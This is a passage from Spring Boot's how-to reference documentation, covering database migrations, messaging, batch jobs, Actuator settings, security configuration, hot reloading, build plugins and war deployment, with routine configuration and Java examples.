in\n{sc-spring-boot}\/jdbc\/DatabaseDriver.{sc-ext}[`DatabaseDriver`].\n\n{sc-spring-boot-autoconfigure}\/flyway\/FlywayProperties.{sc-ext}[`FlywayProperties`]\nprovides most of Flyway's settings and a small set of additional properties that can be\nused to disable the migrations or switch off the location checking. If you need more\ncontrol over the configuration, consider registering a `FlywayConfigurationCustomizer`\nbean.\n\nSpring Boot calls `Flyway.migrate()` to perform the database migration. If you would like\nmore control, provide a `@Bean` that implements\n{sc-spring-boot-autoconfigure}\/flyway\/FlywayMigrationStrategy.{sc-ext}[`FlywayMigrationStrategy`].\n\nFlyway supports SQL and Java https:\/\/flywaydb.org\/documentation\/callbacks.html[callbacks].\nTo use SQL-based callbacks, place the callback scripts in the `classpath:db\/migration`\nfolder. To use Java-based callbacks, create one or more beans that implement\n`Callback`. Any such beans are automatically registered with `Flyway`. They can be\nordered by using `@Order` or by implementing `Ordered`. Beans that implement the\ndeprecated `FlywayCallback` interface can also be detected; however, they cannot be used\nalongside `Callback` beans.\n\nBy default, Flyway autowires the (`@Primary`) `DataSource` in your context and\nuses that for migrations. If you want to use a different `DataSource`, you can create\none and mark its `@Bean` as `@FlywayDataSource`. If you do so and want two data sources,\nremember to create another one and mark it as `@Primary`. Alternatively, you can use\nFlyway's native `DataSource` by setting `spring.flyway.[url,user,password]`\nin external properties. Setting either `spring.flyway.url` or `spring.flyway.user`\nis sufficient to cause Flyway to use its own `DataSource`. If any of the three\nproperties has not been set, the value of its equivalent `spring.datasource` property will\nbe used.\n\n
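For instance, a sketch of pointing Flyway at its own database might look as follows (the\nURL and credentials are illustrative):\n\n[source,properties,indent=0]\n----\n\t# Flyway connects with these settings instead of the application DataSource\n\tspring.flyway.url=jdbc:mysql:\/\/localhost\/migrations\n\tspring.flyway.user=migration\n\tspring.flyway.password=secret\n----\n\n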
There is a {github-code}\/spring-boot-samples\/spring-boot-sample-flyway[Flyway sample] so\nthat you can see how to set things up.\n\nYou can also use Flyway to provide data for specific scenarios. For example, you can\nplace test-specific migrations in `src\/test\/resources` and they are run only when your\napplication starts for testing. Also, you can use profile-specific configuration to\ncustomize `spring.flyway.locations` so that certain migrations run only when a particular\nprofile is active. For example, in `application-dev.properties`, you might specify the\nfollowing setting:\n\n[source,properties,indent=0]\n----\n\tspring.flyway.locations=classpath:\/db\/migration,classpath:\/dev\/db\/migration\n----\n\nWith that setup, migrations in `dev\/db\/migration` run only when the `dev` profile is\nactive.\n\n\n\n[[howto-execute-liquibase-database-migrations-on-startup]]\n==== Execute Liquibase Database Migrations on Startup\nTo automatically run Liquibase database migrations on startup, add\n`org.liquibase:liquibase-core` to your classpath.\n\nBy default, the master change log is read from `db\/changelog\/db.changelog-master.yaml`,\nbut you can change the location by setting `spring.liquibase.change-log`. In addition to\nYAML, Liquibase also supports JSON, XML, and SQL change log formats.\n\nBy default, Liquibase autowires the (`@Primary`) `DataSource` in your context and uses\nthat for migrations. If you need to use a different `DataSource`, you can create one and\nmark its `@Bean` as `@LiquibaseDataSource`. If you do so and you want two data sources,\nremember to create another one and mark it as `@Primary`. Alternatively, you can use\nLiquibase's native `DataSource` by setting `spring.liquibase.[url,user,password]` in\nexternal properties. Setting either `spring.liquibase.url` or `spring.liquibase.user`\nis sufficient to cause Liquibase to use its own `DataSource`. If any of the three\nproperties has not been set, the value of its equivalent `spring.datasource` property will\nbe used.\n\nSee\n{sc-spring-boot-autoconfigure}\/liquibase\/LiquibaseProperties.{sc-ext}[`LiquibaseProperties`]\nfor details about available settings such as contexts, the default schema, and others.\n\nThere is a {github-code}\/spring-boot-samples\/spring-boot-sample-liquibase[Liquibase\nsample] so that you can see how to set things up.\n\n\n\n[[howto-messaging]]\n== Messaging\n\nSpring Boot offers a number of starters that include messaging. This section answers\nquestions that arise from using messaging with Spring Boot.\n\n[[howto-jms-disable-transaction]]\n=== Disable Transacted JMS Session\nIf your JMS broker does not support transacted sessions, you have to disable the\nsupport for transactions altogether. If you create your own `JmsListenerContainerFactory`,\nthere is nothing to do, since, by default, it is not transacted. 
If you want to use\nthe `DefaultJmsListenerContainerFactoryConfigurer` to reuse Spring Boot's default, you\ncan disable transacted sessions, as follows:\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic DefaultJmsListenerContainerFactory jmsListenerContainerFactory(\n\t\t\tConnectionFactory connectionFactory,\n\t\t\tDefaultJmsListenerContainerFactoryConfigurer configurer) {\n\t\tDefaultJmsListenerContainerFactory listenerFactory =\n\t\t\t\tnew DefaultJmsListenerContainerFactory();\n\t\tconfigurer.configure(listenerFactory, connectionFactory);\n\t\tlistenerFactory.setTransactionManager(null);\n\t\tlistenerFactory.setSessionTransacted(false);\n\t\treturn listenerFactory;\n\t}\n----\n\nThe preceding example overrides the default factory, and it should be applied to any\nother factory that your application defines, if any.\n\n\n\n[[howto-batch-applications]]\n== Batch Applications\n\nThis section answers questions that arise from using Spring Batch with Spring Boot.\n\nNOTE: By default, batch applications require a `DataSource` to store job details. If you\nwant to deviate from that, you need to implement `BatchConfigurer`. See\n{spring-batch-javadoc}\/core\/configuration\/annotation\/EnableBatchProcessing.html[The\nJavadoc of `@EnableBatchProcessing`] for more details.\n\nFor more about Spring Batch, see the https:\/\/projects.spring.io\/spring-batch\/[Spring Batch\nproject page].\n\n\n\n[[howto-execute-spring-batch-jobs-on-startup]]\n=== Execute Spring Batch Jobs on Startup\nSpring Batch auto-configuration is enabled by adding `@EnableBatchProcessing`\n(from Spring Batch) somewhere in your context.\n\nBy default, it executes *all* `Jobs` in the application context on startup (see\n{sc-spring-boot-autoconfigure}\/batch\/JobLauncherCommandLineRunner.{sc-ext}[JobLauncherCommandLineRunner]\nfor details). You can narrow down to a specific job or jobs by specifying\n`spring.batch.job.names` (which takes a comma-separated list of job name patterns).\n\n[TIP]\n.Specifying job parameters on the command line\n====\nUnlike command line option arguments that\n<<spring-boot-features.adoc#boot-features-external-config-command-line-args,set properties\nin the `Environment`>> (i.e. by starting with `--`, such as\n`--my-property=value`), job parameters have to be specified on the command line without\ndashes (e.g. `jobParam=value`).\n====\n\nIf the application context includes a `JobRegistry`, the jobs in\n`spring.batch.job.names` are looked up in the registry instead of being autowired from the\ncontext. This is a common pattern with more complex systems, where multiple jobs are\ndefined in child contexts and registered centrally.\n\nSee\n{sc-spring-boot-autoconfigure}\/batch\/BatchAutoConfiguration.{sc-ext}[BatchAutoConfiguration]\nand\nhttps:\/\/github.com\/spring-projects\/spring-batch\/blob\/master\/spring-batch-core\/src\/main\/java\/org\/springframework\/batch\/core\/configuration\/annotation\/EnableBatchProcessing.java[@EnableBatchProcessing]\nfor more details.\n\n\n\n[[howto-actuator]]\n== Actuator\n\nSpring Boot includes the Spring Boot Actuator. This section answers questions that often\narise from its use.\n\n[[howto-change-the-http-port-or-address-of-the-actuator-endpoints]]\n=== Change the HTTP Port or Address of the Actuator Endpoints\nIn a standalone application, the Actuator HTTP port defaults to the same as the main HTTP\nport. To make the application listen on a different port, set the external property\n`management.server.port`. To listen on a completely different network address (such as\nwhen you have an internal network for management and an external one for user\napplications), you can also set `management.server.address` to a valid IP address to which\nthe server is able to bind.\n\n
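For instance, the following sketch (with illustrative values) serves the actuator\nendpoints on a management-only port bound to the loopback interface:\n\n[source,properties,indent=0]\n----\n\t# Serve the actuator endpoints on a separate port\n\tmanagement.server.port=8081\n\t# Bind the management server to localhost only\n\tmanagement.server.address=127.0.0.1\n----\n\n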
For more detail, see the\n{sc-spring-boot-actuator-autoconfigure}\/web\/server\/ManagementServerProperties.{sc-ext}[`ManagementServerProperties`]\nsource code and\n"`<<production-ready-features.adoc#production-ready-customizing-management-server-port>>`"\nin the "`Production-ready features`" section.\n\n\n\n[[howto-customize-the-whitelabel-error-page]]\n=== Customize the '`whitelabel`' Error Page\nSpring Boot installs a '`whitelabel`' error page that you see in a browser client if\nyou encounter a server error (machine clients consuming JSON and other media types should\nsee a sensible response with the right error code).\n\nNOTE: Set `server.error.whitelabel.enabled=false` to switch the default error page off.\nDoing so restores the default of the servlet container that you are using. Note that\nSpring Boot still tries to resolve the error view, so you should probably add your own\nerror page rather than disabling it completely.\n\nOverriding the error page with your own depends on the templating technology that you\nuse. For example, if you use Thymeleaf, you can add an `error.html` template.\nIf you use FreeMarker, you can add an `error.ftl` template. In general, you\nneed a `View` that resolves with a name of `error` or a `@Controller` that handles\nthe `\/error` path. Unless you replaced some of the default configuration, you should find\na `BeanNameViewResolver` in your `ApplicationContext`, so a `@Bean` named `error` would\nbe a simple way of doing that. See\n{sc-spring-boot-autoconfigure}\/web\/servlet\/error\/ErrorMvcAutoConfiguration.{sc-ext}[`ErrorMvcAutoConfiguration`]\nfor more options.\n\nSee also the section on "`<<boot-features-error-handling, Error Handling>>`" for details\nof how to register handlers in the servlet container.\n\n\n\n[[howto-sanitize-sensible-values]]\n=== Sanitize Sensitive Values\nInformation returned by the `env` and `configprops` endpoints can be somewhat sensitive,\nso keys matching a certain pattern are sanitized by default (i.e. their values are\nreplaced by `+******+`).\n\nSpring Boot uses sensible defaults for such keys: for instance, any key ending with the\nword \"password\", \"secret\", \"key\" or \"token\" is sanitized. It is also possible to use a\nregular expression instead, such as `+*credentials.*+` to sanitize any key that holds the\nword `credentials` as part of the key.\n\nThe patterns to use can be customized by setting the `management.endpoint.env.keys-to-sanitize`\nand `management.endpoint.configprops.keys-to-sanitize` properties, respectively.\n\n
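As a minimal sketch, the following setting also sanitizes any `env` key that contains the\nword `credentials` (the list shown is illustrative, not the exact default list):\n\n[source,properties,indent=0]\n----\n\t# Values of matching keys are replaced by ****** in the env endpoint\n\tmanagement.endpoint.env.keys-to-sanitize=password,secret,key,token,.*credentials.*\n----\n\n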
\n\n[[howto-security]]\n== Security\n\nThis section addresses questions about security when working with Spring Boot, including\nquestions that arise from using Spring Security with Spring Boot.\n\nFor more about Spring Security, see the {spring-security}[Spring Security project page].\n\n\n\n[[howto-switch-off-spring-boot-security-configuration]]\n=== Switch off the Spring Boot Security Configuration\nIf you define a `@Configuration` with a `WebSecurityConfigurerAdapter` in your application,\nit switches off the default webapp security settings in Spring Boot.\n\n\n[[howto-change-the-user-details-service-and-add-user-accounts]]\n=== Change the UserDetailsService and Add User Accounts\nIf you provide a `@Bean` of type `AuthenticationManager`, `AuthenticationProvider`,\nor `UserDetailsService`, the default `@Bean` for `InMemoryUserDetailsManager` is not\ncreated, so you have the full feature set of Spring Security available (such as\nhttps:\/\/docs.spring.io\/spring-security\/site\/docs\/current\/reference\/htmlsingle\/#jc-authentication[various\nauthentication options]).\n\nThe easiest way to add user accounts is to provide your own `UserDetailsService` bean.\n\n\n\n[[howto-enable-https]]\n=== Enable HTTPS When Running behind a Proxy Server\nEnsuring that all your main endpoints are only available over HTTPS is an important\nchore for any application. If you use Tomcat as a servlet container, then\nSpring Boot adds Tomcat's own `RemoteIpValve` automatically if it detects some\nenvironment settings, and you should be able to rely on the `HttpServletRequest` to\nreport whether it is secure or not (even downstream of a proxy server that handles the\nreal SSL termination). The standard behavior is determined by the presence or absence of\ncertain request headers (`x-forwarded-for` and `x-forwarded-proto`), whose names are\nconventional, so it should work with most front-end proxies. You can switch on the valve\nby adding some entries to `application.properties`, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\tserver.tomcat.remote-ip-header=x-forwarded-for\n\tserver.tomcat.protocol-header=x-forwarded-proto\n----\n\n(The presence of either of those properties switches on the valve. Alternatively, you can\nadd the `RemoteIpValve` by adding a `TomcatServletWebServerFactory` bean.)\n\nTo configure Spring Security to require a secure channel for all (or some)\nrequests, consider adding your own `WebSecurityConfigurerAdapter` that adds the following\n`HttpSecurity` configuration:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration\n\tpublic class SslWebSecurityConfigurerAdapter extends WebSecurityConfigurerAdapter {\n\n\t\t@Override\n\t\tprotected void configure(HttpSecurity http) throws Exception {\n\t\t\t\/\/ Customize the application security\n\t\t\thttp.requiresChannel().anyRequest().requiresSecure();\n\t\t}\n\n\t}\n----\n\n\n[[howto-hotswapping]]\n== Hot Swapping\n\nSpring Boot supports hot swapping. This section answers questions about how it works.\n\n\n\n[[howto-reload-static-content]]\n=== Reload Static Content\nThere are several options for hot reloading. 
The recommended approach is to use\n<<using-spring-boot.adoc#using-boot-devtools,`spring-boot-devtools`>>, as it provides\nadditional development-time features, such as support for fast application restarts\nand LiveReload as well as sensible development-time configuration (such as template\ncaching). Devtools works by monitoring the classpath for changes. This means that static\nresource changes must be \"built\" for the change to take effect. By default, this happens\nautomatically in Eclipse when you save your changes. In IntelliJ IDEA, the Make Project\ncommand triggers the necessary build. Due to the\n<<using-spring-boot.adoc#using-boot-devtools-restart-exclude, default restart\nexclusions>>, changes to static resources do not trigger a restart of your application.\nThey do, however, trigger a live reload.\n\nAlternatively, running in an IDE (especially with debugging on) is a good way to do\ndevelopment (all modern IDEs allow reloading of static resources and usually also allow\nhot-swapping of Java class changes).\n\nFinally, the <<build-tool-plugins.adoc#build-tool-plugins, Maven and Gradle plugins>> can\nbe configured (see the `addResources` property) to support running from the command line\nwith reloading of static files directly from source. You can use that with an external\ncss\/js compiler process if you are writing that code with higher-level tools.\n\n\n\n[[howto-reload-thymeleaf-template-content]]\n=== Reload Templates without Restarting the Container\nMost of the templating technologies supported by Spring Boot include a configuration\noption to disable caching (described later in this document). If you use the\n`spring-boot-devtools` module, these properties are\n<<using-spring-boot.adoc#using-boot-devtools-property-defaults,automatically configured>>\nfor you at development time.\n\n\n\n[[howto-reload-thymeleaf-content]]\n==== Thymeleaf Templates\nIf you use Thymeleaf, set `spring.thymeleaf.cache` to `false`. See\n{sc-spring-boot-autoconfigure}\/thymeleaf\/ThymeleafAutoConfiguration.{sc-ext}[`ThymeleafAutoConfiguration`]\nfor other Thymeleaf customization options.\n\n\n\n[[howto-reload-freemarker-content]]\n==== FreeMarker Templates\nIf you use FreeMarker, set `spring.freemarker.cache` to `false`. See\n{sc-spring-boot-autoconfigure}\/freemarker\/FreeMarkerAutoConfiguration.{sc-ext}[`FreeMarkerAutoConfiguration`]\nfor other FreeMarker customization options.\n\n\n\n[[howto-reload-groovy-template-content]]\n==== Groovy Templates\nIf you use Groovy templates, set `spring.groovy.template.cache` to `false`. See\n{sc-spring-boot-autoconfigure}\/groovy\/template\/GroovyTemplateAutoConfiguration.{sc-ext}[`GroovyTemplateAutoConfiguration`]\nfor other Groovy customization options.\n\n\n\n[[howto-reload-fast-restart]]\n=== Fast Application Restarts\nThe `spring-boot-devtools` module includes support for automatic application restarts.\nWhile not as fast as technologies such as\nhttps:\/\/zeroturnaround.com\/software\/jrebel\/[JRebel], it is usually significantly faster than\na \"`cold start`\". 
You should probably give it a try before investigating some of the more\ncomplex reload options discussed later in this document.\n\nFor more details, see the <<using-spring-boot.adoc#using-boot-devtools>> section.\n\n\n\n[[howto-reload-java-classes-without-restarting]]\n=== Reload Java Classes without Restarting the Container\nMany modern IDEs (Eclipse, IDEA, and others) support hot swapping of bytecode.\nConsequently, if you make a change that does not affect class or method signatures, it\nshould reload cleanly with no side effects.\n\n\n\n[[howto-build]]\n== Build\n\nSpring Boot includes build plugins for Maven and Gradle. This section answers common\nquestions about these plugins.\n\n\n\n[[howto-build-info]]\n=== Generate Build Information\nBoth the Maven plugin and the Gradle plugin allow generating build information containing\nthe coordinates, name, and version of the project. The plugins can also be configured\nto add additional properties through configuration. When such a file is present,\nSpring Boot auto-configures a `BuildProperties` bean.\n\nTo generate build information with Maven, add an execution for the `build-info` goal, as\nshown in the following example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>build-info<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nTIP: See the {spring-boot-maven-plugin-site}[Spring Boot Maven Plugin documentation]\nfor more details.\n\nThe following example does the same with Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\"]\n----\n\tspringBoot {\n\t\tbuildInfo()\n\t}\n----\n\nTIP: See the\n{spring-boot-gradle-plugin-reference}\/#integrating-with-actuator-build-info[Spring Boot\nGradle Plugin documentation] for more details.\n\n\n\n[[howto-git-info]]\n=== Generate Git Information\n\nBoth Maven and Gradle allow generating a `git.properties` file containing information\nabout the state of your `git` source code repository when the project was built.\n\nFor Maven users, the `spring-boot-starter-parent` POM includes a pre-configured plugin to\ngenerate a `git.properties` file. To use it, add the following declaration to your POM:\n\n[source,xml,indent=0]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>pl.project13.maven<\/groupId>\n\t\t\t\t<artifactId>git-commit-id-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nGradle users can achieve the same result by using the\nhttps:\/\/plugins.gradle.org\/plugin\/com.gorylenko.gradle-git-properties[`gradle-git-properties`]\nplugin, as shown in the following example:\n\n[source,groovy,indent=0]\n----\n\tplugins {\n\t\tid \"com.gorylenko.gradle-git-properties\" version \"1.5.1\"\n\t}\n----\n\nTIP: The commit time in `git.properties` is expected to match the following format:\n`yyyy-MM-dd'T'HH:mm:ssZ`. This is the default format for both plugins listed above. 
Using\nthis format lets the time be parsed into a `Date` and its format, when serialized to JSON,\nto be controlled by Jackson's date serialization configuration settings.\n\n\n\n[[howto-customize-dependency-versions]]\n=== Customize Dependency Versions\nIf you use a Maven build that inherits directly or indirectly from\n`spring-boot-dependencies` (for instance, `spring-boot-starter-parent`) but you want to\noverride a specific third-party dependency, you can add appropriate `<properties>`\nelements. Browse the\n{github-code}\/spring-boot-project\/spring-boot-dependencies\/pom.xml[`spring-boot-dependencies`]\nPOM for a complete list of properties. For example, to pick a different `slf4j` version,\nyou would add the following property:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<slf4j.version>1.7.5<\/slf4j.version>\n\t<\/properties>\n----\n\nNOTE: Doing so only works if your Maven project inherits (directly or indirectly) from\n`spring-boot-dependencies`. If you have added `spring-boot-dependencies` in your\nown `dependencyManagement` section with `<scope>import<\/scope>`, you have to redefine\nthe artifact yourself instead of overriding the property.\n\nWARNING: Each Spring Boot release is designed and tested against this specific set of\nthird-party dependencies. Overriding versions may cause compatibility issues.\n\nTo override dependency versions in Gradle, see {spring-boot-gradle-plugin-reference}\/#managing-dependencies-customizing[this section]\nof the Gradle plugin's documentation.\n\n[[howto-create-an-executable-jar-with-maven]]\n=== Create an Executable JAR with Maven\nThe `spring-boot-maven-plugin` can be used to create an executable \"`fat`\" JAR. If you\nuse the `spring-boot-starter-parent` POM, you can declare the plugin and your jars are\nrepackaged as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nIf you do not use the parent POM, you can still use the plugin. However, you must\nadditionally add an `<executions>` section, as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>repackage<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nSee the {spring-boot-maven-plugin-site}\/usage.html[plugin documentation] for full usage\ndetails.\n\n\n[[howto-create-an-additional-executable-jar]]\n=== Use a Spring Boot Application as a Dependency\nLike a war file, a Spring Boot application is not intended to be used as a dependency. If\nyour application contains classes that you want to share with other projects, the\nrecommended approach is to move that code into a separate module. The separate module can\nthen be depended upon by your application and other projects.\n\nIf you cannot rearrange your code as recommended above, Spring Boot's Maven and Gradle\nplugins must be configured to produce a separate artifact that is suitable for use as a\ndependency. 
The executable archive cannot be used as a dependency as the\n<<appendix-executable-jar-format.adoc#executable-jar-jar-file-structure,executable jar\nformat>> packages application classes in `BOOT-INF\/classes`. This means\nthat they cannot be found when the executable jar is used as a dependency.\n\nTo produce the two artifacts, one that can be used as a dependency and one that is\nexecutable, a classifier must be specified. This classifier is applied to the name of the\nexecutable archive, leaving the default archive for use as a dependency.\n\nTo configure a classifier of `exec` in Maven, you can use the following configuration:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<classifier>exec<\/classifier>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\n\n\n[[howto-extract-specific-libraries-when-an-executable-jar-runs]]\n=== Extract Specific Libraries When an Executable Jar Runs\nMost nested libraries in an executable jar do not need to be unpacked in order to run.\nHowever, certain libraries can have problems. For example, JRuby includes its own nested\njar support, which assumes that the `jruby-complete.jar` is always directly available as a\nfile in its own right.\n\nTo deal with any problematic libraries, you can flag that specific nested jars should be\nautomatically unpacked when the executable jar first runs. Such nested jars are written\nbeneath the temporary directory identified by the `java.io.tmpdir` system property.\n\nWARNING: Care should be taken to ensure that your operating system is configured so that\nit will not delete the jars that have been unpacked to the temporary directory while the\napplication is still running.\n\nFor example, to indicate that JRuby should be flagged for unpacking by using the Maven\nPlugin, you would add the following configuration:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<requiresUnpack>\n\t\t\t\t\t\t<dependency>\n\t\t\t\t\t\t\t<groupId>org.jruby<\/groupId>\n\t\t\t\t\t\t\t<artifactId>jruby-complete<\/artifactId>\n\t\t\t\t\t\t<\/dependency>\n\t\t\t\t\t<\/requiresUnpack>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\n\n\n[[howto-create-a-nonexecutable-jar]]\n=== Create a Non-executable JAR with Exclusions\nOften, if you have an executable and a non-executable jar as two separate build products,\nthe executable version has additional configuration files that are not needed in a library\njar. 
For example, the `application.yml` configuration file might be excluded from the\nnon-executable JAR.\n\nIn Maven, the executable jar must be the main artifact and you can add a classified jar\nfor the library, as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t\t<plugin>\n\t\t\t\t<artifactId>maven-jar-plugin<\/artifactId>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<id>lib<\/id>\n\t\t\t\t\t\t<phase>package<\/phase>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>jar<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t\t<configuration>\n\t\t\t\t\t\t\t<classifier>lib<\/classifier>\n\t\t\t\t\t\t\t<excludes>\n\t\t\t\t\t\t\t\t<exclude>application.yml<\/exclude>\n\t\t\t\t\t\t\t<\/excludes>\n\t\t\t\t\t\t<\/configuration>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\n\n\n[[howto-remote-debug-maven-run]]\n=== Remote Debug a Spring Boot Application Started with Maven\nTo attach a remote debugger to a Spring Boot application that was started with Maven, you\ncan use the `jvmArguments` property of the {spring-boot-maven-plugin-site}[maven plugin].\n\nSee {spring-boot-maven-plugin-site}\/examples\/run-debug.html[this example] for more\ndetails.\n\n\n\n[[howto-build-an-executable-archive-with-ant]]\n=== Build an Executable Archive from Ant without Using `spring-boot-antlib`\nTo build with Ant, you need to grab dependencies, compile, and then create a jar or war\narchive. To make it executable, you can either use the `spring-boot-antlib`\nmodule or you can follow these instructions:\n\n. If you are building a jar, package the application's classes and resources in a nested\n`BOOT-INF\/classes` directory. If you are building a war, package the application's\nclasses in a nested `WEB-INF\/classes` directory as usual.\n. Add the runtime dependencies in a nested `BOOT-INF\/lib` directory for a jar or\n`WEB-INF\/lib` for a war. Remember *not* to compress the entries in the archive.\n. Add the `provided` (embedded container) dependencies in a nested `BOOT-INF\/lib`\ndirectory for a jar or `WEB-INF\/lib-provided` for a war. Remember *not* to compress the\nentries in the archive.\n. Add the `spring-boot-loader` classes at the root of the archive (so that the `Main-Class`\nis available).\n. 
Use the appropriate launcher (such as `JarLauncher` for a jar file) as a `Main-Class`\nattribute in the manifest and specify the other properties it needs as manifest entries --\nprincipally, by setting a `Start-Class` property.\n\nThe following example shows how to build an executable archive with Ant:\n\n[source,xml,indent=0]\n----\n\t<target name=\"build\" depends=\"compile\">\n\t\t<jar destfile=\"target\/${ant.project.name}-${spring-boot.version}.jar\" compress=\"false\">\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"target\/classes\" \/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/classes\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"src\/main\/resources\" erroronmissingdir=\"false\"\/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/classes\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"${lib.dir}\/runtime\" \/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/lib\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<zipfileset src=\"${lib.dir}\/loader\/spring-boot-loader-jar-${spring-boot.version}.jar\" \/>\n\t\t\t<manifest>\n\t\t\t\t<attribute name=\"Main-Class\" value=\"org.springframework.boot.loader.JarLauncher\" \/>\n\t\t\t\t<attribute name=\"Start-Class\" value=\"${start-class}\" \/>\n\t\t\t<\/manifest>\n\t\t<\/jar>\n\t<\/target>\n----\n\nThe {github-code}\/spring-boot-samples\/spring-boot-sample-ant[Ant Sample] has a\n`build.xml` file with a `manual` task that should work if you run it with the following\ncommand:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ ant -lib <folder containing ivy-2.2.jar> clean manual\n----\n\nThen you can run the application with the following command:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ java -jar target\/*.jar\n----\n\n\n\n[[howto-traditional-deployment]]\n== Traditional Deployment\n\nSpring Boot supports traditional deployment as well as more modern forms of deployment.\nThis section answers common questions about traditional deployment.\n\n\n\n[[howto-create-a-deployable-war-file]]\n=== Create a Deployable War File\n\nWARNING: Because Spring WebFlux does not strictly depend on the Servlet API and\napplications are deployed by default on an embedded Reactor Netty server,\nWar deployment is not supported for WebFlux applications.\n\nThe first step in producing a deployable war file is to provide a\n`SpringBootServletInitializer` subclass and override its `configure` method. Doing so\nmakes use of Spring Framework's Servlet 3.0 support and lets you configure your\napplication when it is launched by the servlet container. Typically, you should update\nyour application's main class to extend `SpringBootServletInitializer`, as shown in the\nfollowing example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder application) {\n\t\t\treturn application.sources(Application.class);\n\t\t}\n\n\t\tpublic static void main(String[] args) {\n\t\t\tSpringApplication.run(Application.class, args);\n\t\t}\n\n\t}\n----\n\nThe next step is to update your build configuration such that your project produces a war\nfile rather than a jar file. 
If you use Maven and `spring-boot-starter-parent` (which\nconfigures Maven's war plugin for you), all you need to do is to modify `pom.xml` to\nchange the packaging to war, as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<packaging>war<\/packaging>\n----\n\nIf you use Gradle, you need to modify `build.gradle` to apply the war plugin to the\nproject, as follows:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tapply plugin: 'war'\n----\n\nThe final step in the process is to ensure that the embedded servlet container does not\ninterfere with the servlet container to which the war file is deployed. To do so, you\nneed to mark the embedded servlet container dependency as being provided.\n\nIf you use Maven, the following example marks the servlet container (Tomcat, in this\ncase) as being provided:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependencies>\n\t\t<!-- \u2026 